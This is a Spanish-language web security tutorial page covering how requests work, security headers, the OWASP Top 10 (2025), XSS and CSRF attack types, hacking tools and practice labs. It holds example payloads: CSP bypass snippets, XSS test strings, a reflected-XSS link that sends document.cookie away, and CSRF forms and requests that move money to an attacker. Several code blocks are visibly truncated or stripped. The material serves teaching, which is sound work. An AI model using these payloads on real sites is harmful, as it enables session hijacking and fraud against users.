> For the complete documentation index, see [llms.txt](https://0xnotkyo.gitbook.io/faq.hollowsec/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xnotkyo.gitbook.io/faq.hollowsec/hacking/fundamentos-de-seguridad-web.md). # Fundamentos de Seguridad Web

Las aplicaciones web son el objetivo más común para los hackers hoy en día. ¿Por qué? Porque **TODO** está en la web — banco, sanidad, gobierno, compras, redes sociales. Más del 80% de todos los ciberataques tienen como objetivo aplicaciones web. Si puedes hackear la web, puedes hackear el mundo. Este capítulo te enseñará cómo funcionan las aplicaciones web a un nivel fundamental, para luego mostrarte exactamente dónde y cómo fallan. Al final, comprenderás la arquitectura que impulsa la internet moderna y la verás **a través de los ojos de un hacker** — cada funcionalidad como una vulnerabilidad potencial, cada entrada como un vector de ataque. {% hint style="info" icon="briefcase" %} #### Realidad Profesional Más del 70% de los empleos de pentesting se centran en aplicaciones web. Empresas como Google, Facebook, Microsoft y muchas otras pagan recompensas por bugs que van desde 500 hasta más de 100.000 dólares por vulnerabilidades web. {% endhint %}


🎯 ¿Por qué Hacking Web?	Toda empresa tiene presencia web Recompensas por bugs muy lucrativas No se necesita acceso físico Ataque desde cualquier parte del mundo Superficie de ataque enorme
📊 Estadísticas de Vulnerabilidades Web	Inyección: #3 del OWASP Top 10 Control de Acceso Roto: #1 XSS: Sigue siendo increíblemente común Web media: más de 15 vulnerabilidades Pago medio por bug bounty: más de 3.000$

## Cómo funciona realmente la Web Antes de poder hackear sitios web, necesitas entender qué ocurre cuando escribes una URL y pulsas Enter. La mayoría de la gente no tiene ni idea — pero como hacker, verás la web como una compleja danza de protocolos, donde cada paso es una oportunidad potencial para interceptar, modificar o explotar.

🍕 La Metáfora del Restaurante (click aquí)

Imagina internet como una ciudad enorme llena de restaurantes (sitios web):
* Tu Navegador = Tú, el cliente que entra en un restaurante * DNS = La guía telefónica (convierte "Pizzería" en una dirección real) * Dirección IP = La dirección física del restaurante (192.168.1.1) * Puerto = Qué puerta usar (puerta principal = 80, entrada VIP = 443) * Petición HTTP = Tu pedido ("Quiero una pizza de pepperoni con extra de queso") * Servidor Web = La cocina que recibe y prepara tu pedido * Base de Datos = La despensa donde se almacena los ingredientes (datos) * Respuesta HTTP = Tu comida llegando a la mesa * Cookies = Tu tarjeta de fidelidad que recuerda quién eres\ \ Hackear es encontrar formas de conseguir comida gratis, colarse en la cocina, leer los pedidos de otras personas o convertirse en el gerente sin permiso.

*** ### El Viaje Completo de una Petición Web ```shellscript # Escribes: https://bank.com/account # ==================== PASO 1: ANÁLISIS DE LA URL ==================== # El navegador descompone la URL: Protocolo: https:// (usar cifrado) Dominio: bank.com (con quién hablamos) Ruta: /account (qué queremos) Puerto: 443 (implícito en https) # ==================== PASO 2: RESOLUCIÓN DNS ==================== # "¿Cuál es la dirección IP de bank.com?" Tu Ordenador → Caché DNS Local (¿ya la conocemos?) → Caché DNS del Router (¿quizás el router la sabe?) → Servidor DNS del ISP (suele conocer sitios comunes) → Servidores DNS Raíz (cima de la cadena) → Servidores TLD .com (gestiona todos los .com) → Servidor Autoritativo de bank.com (¡respuesta final!) Respuesta: "bank.com está en 203.0.113.50" # ==================== PASO 3: CONEXIÓN TCP ==================== # Tu ordenador se conecta a 203.0.113.50 en el puerto 443 Three-Way Handshake: Tu PC → [SYN] → Servidor "Hola, ¿quieres hablar?" Tu PC ← [SYN-ACK] ← Servidor "Claro, te escucho!" Tu PC → [ACK] → Servidor "Perfecto, ¡estamos conectados!" # ==================== PASO 4: TLS HANDSHAKE (HTTPS) ==================== # Estableciendo conexión cifrada Client Hello: "Soporto TLS 1.3, estos cifrados..." Server Hello: "Usemos TLS 1.3 con AES-256-GCM" Certificado: "Aquí está mi certificado SSL que prueba que soy bank.com" Verificación: El navegador comprueba el certificado con las CAs de confianza Intercambio: Ambas partes derivan una clave de cifrado compartida Finalizado: ¡Todo el tráfico futuro está cifrado! # ==================== PASO 5: PETICIÓN HTTP ENVIADA ==================== # Ahora cifrada y enviada a través del túnel TLS GET /account HTTP/1.1 Host: bank.com Cookie: session=abc123def456 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml Accept-Language: es-ES,es;q=0.9 Accept-Encoding: gzip, deflate, br Connection: keep-alive # ==================== PASO 6: PROCESAMIENTO EN EL SERVIDOR ==================== # El servidor web recibe y procesa tu petición 1. El Servidor Web (Apache/Nginx) recibe la petición 2. Enruta a la aplicación (PHP/Python/Node.js/etc.) 3. La aplicación comprueba: ¿está este usuario autenticado? - Busca session=abc123def456 en la base de datos - Encuentra: ID de usuario 1234, nombre "John Smith" 4. La aplicación consulta la base de datos: - SELECT balance FROM accounts WHERE user_id = 1234 - Resultado: 10.000 € 5. La aplicación genera la página HTML con tus datos 6. La respuesta se envía de vuelta al navegador # ==================== PASO 7: RESPUESTA HTTP ==================== HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Content-Length: 12345 Set-Cookie: tracking=xyz789; SameSite=Lax Cache-Control: no-store X-Frame-Options: DENY Content-Security-Policy: default-src 'self' Tu Cuenta

Bienvenido, John Smith

Tu saldo: 10.000 €

# ==================== PASO 8: RENDERIZADO DEL NAVEGADOR ==================== 1. Parsear HTML en DOM (Document Object Model) 2. Parsear CSS en CSSOM (CSS Object Model) 3. Cargar recursos externos: - → Otra petición HTTP - # Si AngularJS está en CDN en lista blanca: {{constructor.constructor('alert(1)')()}} # Si base-uri no está configurado: # ¡Ahora todas las URLs relativas cargan desde evil.com! # Si script-src incluye 'unsafe-eval': eval('alert(1)'); new Function('alert(1)')(); # Modo Report-Only de CSP (no bloquea, solo informa): Content-Security-Policy-Report-Only: ... # ¡Útil para pruebas, pero podría quedarse en producción! ``` *** ### Otras Características de Seguridad del Navegador


🖼️ X-Frame-Options	Propósito: Prevenir el clickjacking controlado si la página puede ser enmarcada	`DENY # Nunca permitir enmarcado SAMEORIGIN # Solo el mismo origen ALLOW-FROM url # URL específica (obsoleto)`	La página puede ser enmarcada → ¡clickjacking posible!
🔒 HSTS	Propósito: Forzar HTTPS, prevenir ataques de SSL stripping	`Strict-Transport-Security: max-age=31536000; includeSubDomains; preload`	La primera petición es vulnerable a MITM
📄 X-Content-Type-Options	Propósito: Prevenir el MIME sniffing (tratar CSS como JavaScript)	`X-Content-Type-Options: nosniff`	El navegador podría ejecutar código no-script como script
🌐 CORS	Propósito: Permitir peticiones entre orígenes de forma controlada	`Access-Control-Allow-Origin: * # ¡PELIGROSO con credenciales!`	¿Mal configurado? Sitios arbitrarios pueden leer las respuestas

## OWASP TOP 10: Las Vulnerabilidades Más Críticas OWASP (Open Web Application Security Project) mantiene la lista definitiva de las vulnerabilidades web más peligrosas. Esta lista **se actualiza periódicamente con datos del mundo real**. Todo hacker web debe conocerlas de principio a fin — representan las vulnerabilidades más comunes e impacientes que encontrarás. {% hint style="success" icon="lightbulb" %} #### ¿Por qué importa el OWASP Top 10? El OWASP Top 10 no es solo una lista — es un marco de referencia que impulsa toda la industria de la seguridad. Los informes de pentesting se organizan en torno a él. Las herramientas de seguridad escanean en busca de él. Los marcos de cumplimiento normativo lo referencian. Los programas de Bug Bounty lo priorizan. **Si entiendes en profundidad estas 10 categorías, entiendes la seguridad web**. {% endhint %}


A01: Control de Acceso Roto	La vulnerabilidad #1. Los usuarios pueden acceder a recursos que no deberían:	IDOR: Cambiar /user/123 por /user/124 muestra los datos de otro usuario Escalada de privilegios: Un usuario normal accede a funciones de administrador Directory traversal: .../../etc/paswd Control de acceso a nivel de función ausente	Más Información	https://owasp.org/Top10/2025/A01_2025-Broken_Access_Control/
A02: Configuración Incorrecta de Seguridad	Valores por defecto inseguros, configuraciones incompletas, errores detallados:	Contraseñas por defecto sin cambiar Funcionalidades innecesarias habilitadas Stack traces en mensajes de error Cabeceras de seguridad ausentes Listado de directorios habilitado Almacenamiento en la nuble accesible públicamente	Más Información	https://owasp.org/Top10/2025/A02_2025-Security_Misconfiguration/
A03: Fallos en la Cadena de Suministro de Software	Riesgos derivados de dependencias y componentes externos:	Librerías y frameworks desactualizados con vulnerabilidades conocidas Scripts de CDN sin verificación de integridad CMS sin parchear (WordPress, Drupal) Sin inventario de componentes Vulnerabilidades en Log4j, jQuery, Bootstrap	Más Información	https://owasp.org/Top10/2025/A03_2025-Software_Supply_Chain_Failures/
A04: Fallos Criptográficos	Datos sensibles expuestos por criptografía débil o ausente:	Contraseñas almacenadas en texto claro o con hashing débil (MD5) HTTP en lugar de HTTPS Algoritmos de cifrado débiles (DES, RC4) Claves de cifrado hardcodeadas Datos sensibles en parámetros de URL	Más Información	https://owasp.org/Top10/2025/A04_2025-Cryptographic_Failures/
A05: Inyección	Datos no confiables interpretados como comandos:	SQL Injection (SQLi) NoSQL Injection Inyección de comandos del SO LDAP Injection XPath Injection Template Injection (SSTI)	Más Información	https://owasp.org/Top10/2025/A05_2025-Injection/
A06: Diseño Inseguro	Fallos arquitectónicos que no pueden resolverse con código — requieren rediseño:	Rate limiting ausente en el restablecimiento de contraseña Preguntas de seguridad con respuestas públicas Confiar únicamente en la validación del lado del cliente Lógica de negocio defectuosa	Más Información	https://owasp.org/Top10/2025/A06_2025-Insecure_Design/
A07: Fallos de Autenticación	Autenticación y gestión de sesiones rotas:	Contraseñas débiles permitidas Vulnerable a credential stuffing Fijación de sesión Tokens de sesión en la URL MFA ausente Sesiones que no expiran	Más Información	https://owasp.org/Top10/2025/A07_2025-Authentication_Failures/
A08: Fallos de Integridad del Software o los Datos	Código de fuentes no confiables, actualizaciones inseguras:	Scripts de CDN sin verificación de integridad Pipelines CI/CD inseguros Actualizaciones automáticas sin verificación Vulnerabilidades de deserialización	Más Información	https://owasp.org/Top10/2025/A08_2025-Software_or_Data_Integrity_Failures/
A09: Fallos de Registro y Alertas de Seguridad	Registro y monitorización insuficientes:	Fallos de inicio de sesión no registrados Sin alertas ante ataques Logs almacenados solo localmente Datos sensibles en los logs Sin protección de integridad de los logs	Más Información	https://owasp.org/Top10/2025/A09_2025-Security_Logging_and_Alerting_Failures/
A10: Gestión Incorrecta de Condiciones Excepcionales	Manejo inadecuado de errores y situaciones inesperadas:	Mensajes de error que revelan información sensible del sistema Excepciones no capturadas que provocan fallos en la aplicación Comportamiento inconsistente ante entradas inesperadas Stack traces expuestos en producción Fallos en cascada por ausencia de manejo defensivo de errores	Más Información	https://owasp.org/Top10/2025/A10_2025-Mishandling_of_Exceptional_Conditions/

{% hint style="warning" %} #### Más allá del Top 10 El OWASP Top 10 es un punto de partida, no una lista completa. Otras vulnerabilidades críticas que no aparecen en la edición 2025 incluyen: * **XML External Entity (XXE):** Parseo de XML que referencia entidades externas * **IDOR (Insecure Direct Object Reference):** Acceso directo a objetos mediante entrada del usuario — aunque relacionado con A01:2025, merece atención propia * **Fallos de Lógica de Negocio:** Abuso de funcionalidades legítimas * **Race Conditions:** Explotación de ventanas de tiempo * **HTTP Request Smuggling:** Bypass de seguridad mediante peticiones malformadas * **SSRF (Server-Side Request Forgery):** El servidor realiza peticiones en nombre del atacante — presente en ediciones anteriores y sigue siendo muy prevalente {% endhint %}

## Cross-Site Scripting (XSS) XSS permite a los atacantes inyectar JavaScript malicioso en páginas web vistas por otros usuarios. Es una de las vulnerabilidades **más comunes y peligrosas** — y una de las más entretenidas de explotar. Cuando encuentras XSS, puedes hacer que el navegador de la víctima haga casi cualquier cosa que ella misma podría hacer.

📺 La Metáfora de la Emisión de TV Secuestrada (click aquí)

Imagina una cadena de televisión (el sitio web) que emite contenido enviado por los espectadores sin revisarlo. Un atacante envía un vídeo que dice "¡Manda tu contraseña bancaria a esta dirección!" y se emite a millones de espectadores. **Eso es XSS** — inyectar tu contenido en una fuente de confianza para que las víctimas lo crean y lo ejecuten.

*** ### Tipos de XSS


🔄 Reflected XSS	El payload está en la petición y se refleja inmediatamente en la respuesta. La víctima debe hacer clic en un enlace malicioso. No persistente	`# URL vulnerable: /search?q=<script>alert(1)</script> # La página muestra: "Resultados para \" # Ataque: envía a la víctima este enlace: [https://shop.com/search?q=\<script>](https://shop.com/search?q=\<script>) document.location='' +document.cookie\`
💾 Stored XSS	El payload se guarda en la base de datos y se sirve a TODOS los usuarios que visitan esa página. Persistente y más peligroso. Comentarios, perfiles, mensajes	`# El atacante publica un comentario: "¡Gran artículo! \" # Cada visitante de la página: * Recibe el script ejecutado * Cookies enviadas al atacante * ¡Sesión secuestrada!`
🔧 DOM-based XSS	El payload nunca llega al servidor — el JS del lado del cliente procesa la entrada del atacante de forma insegura. Más difícil de detectar porque los logs del servidor no muestran nada sospechoso	`# JavaScript vulnerable: document.write(location.hash) document.getElementById('x').innerHTML = url # Ataque: page.html#\ # Fuentes: location.hash, location.search # Sinks: innerHTML, document.write, eval`

🔄 Reflected XSS

El payload está en la petición y se refleja inmediatamente en la respuesta. La víctima debe hacer clic en un enlace malicioso. No persistente

# URL vulnerable: /search?q=<script>alert(1)</script>

# La página muestra: "Resultados para \"

# Ataque: envía a la víctima este enlace:

[https://shop.com/search?q=\<script>](https://shop.com/search?q=\<script>)
document.location=''
+document.cookie\

💾 Stored XSS

El payload se guarda en la base de datos y se sirve a TODOS los usuarios que visitan esa página. Persistente y más peligroso. Comentarios, perfiles, mensajes

# El atacante publica un comentario:
"¡Gran artículo! \"

# Cada visitante de la página:

* Recibe el script ejecutado
* Cookies enviadas al atacante
* ¡Sesión secuestrada!

🔧 DOM-based XSS

El payload nunca llega al servidor — el JS del lado del cliente procesa la entrada del atacante de forma insegura. Más difícil de detectar porque los logs del servidor no muestran nada sospechoso

# JavaScript vulnerable:
  document.write(location.hash)
  document.getElementById('x').innerHTML = url

# Ataque:

page.html#\

# Fuentes: location.hash, location.search

# Sinks:   innerHTML, document.write, eval

*** ### Payloads XSS - De Básico a Avanzado ```shellscript # ==================== DETECCIÓN BÁSICA ==================== # Clásico # Prueba en qué dominio estás # Muestra las cookies # ==================== BASADO EN ETIQUETAS (cuando

# Caracteres codificados # "XSS"

# Entidades HTML

# Unicode # Escapar de atributos " onmouseover="alert(1) ' onfocus='alert(1)' autofocus=' # Codificación doble/anidada %253Cscript%253Ealert(1)%253C/script%253E # Protocolo JavaScript clic clic # URI de datos clic # SVG con script embebido # Template literals (ES6) # ==================== ROBO DE COOKIES ====================


🖼️ Image Tag	Ataques de petición GET simples. Limitado pero funciona en sitios mal diseñados	`<img src="https://bank.com/transfer?to=atacante&amount=100"> # Invisible, se carga automáticamente`
📝 Auto-submitting Form	Para acciones basadas en POST. El ataque CSRF más común	`<body onload="document.forms[0].submit()"> <form action="objetivo" method="POST"> <input name="action" value="malo"> </form> </body>`
🔗 Link-based	Requiere que la víctima haga clic. Puede camuflarse	`<a href="https://bank.com/transfer?to=atacante&amount=100"> ¡Haz clic para conseguir un iPhone gratis! </a>`
📡 AJAX-based	Más complejo, requiere una mala configuración de CORS	`<script> fetch('https://objetivo.com/api/accion', { method: 'POST', credentials: 'include', body: 'malicious=data' }); </script>`

## Herramientas Esenciales para el Hacking Web Estas son las herramientas que todo hacker web usa a diario. Domínalas y serás capaz de encontrar vulnerabilidades que los escáneres automáticos pasan por alto. La herramienta adecuada no te convierte en hacker — lo que importa es saber cómo usarla.

🔧 La Caja de Herramientas del Artesano (click aquí)

Un carpintero no solo posee un martillo — sabe exactamente cuándo usar un martillo, un destornillador o una sierra. Del mismo modo, un hacker web necesita saber cuándo usar **Burp, curl o las herramientas de desarrollo del navegador**. La herrameinta debe ser una extensión de tu pensamiento, no un sustituto de él.


🔵 Burp Suite	El proxy web definitivo. Estándar de la industria para pentesters. Intercepta, modifica y repite peticiones HTTP. Imprescindible para encontrar y explotar vulnerabilidades	Proxy: Intercepta todo el tráfico Repeater: Pruebas manuales Intruder: Ataques automatizados Scanner: Escaneo de vulnerabilidades (solo versión Pro)
🟢 OWASP ZAP	Alternativa gratuita a Burp. Ideal para principiantes. Incluye escaneo automatizado y capacidades de ataque activo	100% gratuito y de código abierto Escáner automatizado integrado HUD para pruebas en el navegador Comunidad activa
💉 SQLMap	Herramienta automatizada de Inyección SQL. Detecta, explota y vuelca bases de datos. También puede obtener acceso shell al SO	Soporta múltiples bases de datos Técnicas de bypass automáticas Funciones de toma de control de la BD Lectura/escritura de archivos
🔍 Nikto	Escáner de servidores web. Encuentra configuraciones incorrectas, software desactualizado, archivos peligrosos y vulnerabilidades comunes	Más de 6.700 archivos potencialmente peligrosos Detección de versiones del servidor Múltiples formatos de salida Reconocimiento inicial rápido
📁 Gobuster / Dirbuster / Feroxbuster	Fuerza bruta de directorios y archivos. Encuentra paneles de administración ocultos, archivos de backup, archivos de configuración y endpoints olvidados	Multihilo y rápido Escaneo recursivo Wordlists personalizadas Fuerza bruta de extensiones
🛠️ Browser DevTools	Integradas en cualquier navegador. Inspecciona peticiones, modifica el DOM, depura JavaScript. Gratuitas y sorprendentemente potentes	Pestaña Network: Ver todas las peticiones Consola: Ejecutar JavaScript Elementos: Modificar el DOM Aplicación: Cookies y almacenamiento
🌐 Nmap	Escáner de red. Encuentra servidores web, identifica tecnologías y comprueba vulnerabilidades con scripts NSE	Escaneo de puertos Detección de servicios Scripts de enumeración HTTP Escaneo de vulnerabilidades
📝 Wfuzz / ffuf	Prueba parámetros, cabeceras y rutas con payloads personalizados. Más flexible que la fuerza bruta de directorios	Fuzzea cualquier parte de la petición Filtra respuestas Múltiples wordlists Rápido y eficiente


PortSwigger Web Academy	Plataforma gratuita creada por los autores de Burp Suite. Contiene cientos de labs interactivos organizados por vulnerabilidad (SQLi, XSS, CSRF, SSRF, etc). La referencia absoluta para aprender hacking web de forma práctica y legal
DVWA (Damn Vulnerable Web Application)	Aplicación PHP/MySQL, intencionalmente vulnerable. Permite practicar SQLi, XSS, CSRF, Command Injection y más, con niveles de dificultad ajustables. Perfecta para empezar
OWASP WebGoat	Aplicación web vulnerable mantenida por OWASP. Incluye lecciones guiadas sobre cada vulnerabilidad del Top 10. Ideal para aprender mientras practicas
OWASP Juice Shop	Aplicación de e-commerce intencionalmente insegura. Una de las más completas y modernas — cubre más de 100 retos de seguridad web. Disponible como Docker o en HackTheBox/TryHackMe
HackTheBox / TryHackMe	Plataformas online con máquinas y retos web en entornos controlados. HackTheBox es más avanzado; TryHackMe es más guiado y recomendable para principiantes
VirtualBox / VMware + Kali Linux	Ejecuta todas las herramientas mencionadas en este capítulo desde Kali Linux en una máquina virtual aislada. Combínalo con DVWA o Juice Shop en otra VM para tener un laboratorio web completo y seguro

***

Apoya este proyecto ☕

¿Te ha servido de ayuda? Si este contenido te ha sido útil, puedes apoyar mi trabajo invitándome a un café en Ko-fi. ¡Gracias por leer!

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xnotkyo.gitbook.io/faq.hollowsec/hacking/fundamentos-de-seguridad-web.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.

🎯 ¿Por qué Hacking Web?

📊 Estadísticas de Vulnerabilidades Web

Bienvenido, John Smith

🖼️ X-Frame-Options

🔒 HSTS

📄 X-Content-Type-Options

🌐 CORS

A01: Control de Acceso Roto

A02: Configuración Incorrecta de Seguridad

A03: Fallos en la Cadena de Suministro de Software

A04: Fallos Criptográficos

A05: Inyección

A06: Diseño Inseguro

A07: Fallos de Autenticación

A08: Fallos de Integridad del Software o los Datos

A09: Fallos de Registro y Alertas de Seguridad

A10: Gestión Incorrecta de Condiciones Excepcionales

🔄 Reflected XSS

💾 Stored XSS

🔧 DOM-based XSS

🖼️ Image Tag

📝 Auto-submitting Form

🔗 Link-based

📡 AJAX-based

🔵 Burp Suite

🟢 OWASP ZAP

💉 SQLMap

🔍 Nikto

📁 Gobuster / Dirbuster / Feroxbuster

🛠️ Browser DevTools

🌐 Nmap

📝 Wfuzz / ffuf

PortSwigger Web Academy

DVWA (Damn Vulnerable Web Application)

OWASP WebGoat

OWASP Juice Shop

HackTheBox / TryHackMe

VirtualBox / VMware + Kali Linux

Apoya este proyecto ☕